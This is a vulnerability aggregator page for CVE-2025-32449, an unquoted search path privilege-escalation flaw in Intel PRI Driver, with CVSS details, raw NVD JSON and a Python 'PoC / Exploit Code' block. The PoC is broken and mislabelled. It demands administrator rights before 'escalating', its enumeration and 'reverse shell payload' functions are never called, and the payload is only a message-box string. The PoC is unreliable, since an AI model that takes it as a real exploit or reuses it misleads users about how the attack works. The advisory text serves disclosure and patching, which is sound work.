Security Vulnerability Report
中文
CVE-2025-32449 CVSS 6.7 MEDIUM

CVE-2025-32449

Published: 2025-11-11 17:15:50
Last Modified: 2026-04-15 00:35:42

Description

Unquoted search path for some PRI Driver software before version 03.03.1002 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Intel PRI Driver < 03.03.1002

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-32449 PoC - Unquoted Search Path Exploitation # Target: Intel PRI Driver < 03.03.1002 # Attack Vector: Path Hijacking via Unquoted Service Path import os import sys import subprocess import ctypes def check_privilege(): """Check if running with administrative privileges""" try: is_admin = ctypes.windll.shell32.IsUserAnAdmin() return is_admin != 0 except: return False def enumerate_service_paths(service_name): """Enumerate unquoted service executable paths""" try: result = subprocess.run( ['sc', 'qc', service_name], capture_output=True, text=True ) return result.stdout except Exception as e: return None def create_malicious_executable(target_path): """Generate reverse shell payload for privilege escalation""" # This would contain actual malicious code # For educational purposes only - do not use maliciously malicious_code = f''' #include <windows.h> #include <stdio.h> int main() {{ // Malicious executable that would be executed instead of legitimate service // This would spawn a SYSTEM shell or perform other malicious actions MessageBox(NULL, "Malicious code executed!", "CVE-2025-32449", MB_OK); return 0; }} ''' return malicious_code def main(): print("CVE-2025-32449 Intel PRI Driver Exploitation Framework") print("=" * 60) if not check_privilege(): print("[!] This exploit requires administrative privileges") print("[!] Please run as Administrator") sys.exit(1) # Search for vulnerable PRI Driver service paths print("[*] Enumerating Intel PRI Driver service configurations...") # Check common paths for potential exploitation vulnerable_paths = [ r"C:\Program Files\Intel\PRI Driver\bin", r"C:\Program Files (x86)\Intel\PRI Driver\bin", r"C:\Windows\System32", r"C:\Windows\SysWOW64" ] for path in vulnerable_paths: if os.path.exists(path): print(f"[+] Found path: {path}") print("\n[*] Mitigation: Upgrade Intel PRI Driver to version 03.03.1002 or later") print("[*] Reference: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01394.html") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-32449", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:49.723", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unquoted search path for some PRI Driver software before version 03.03.1002 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01394.html", "source": "[email protected]"}]}}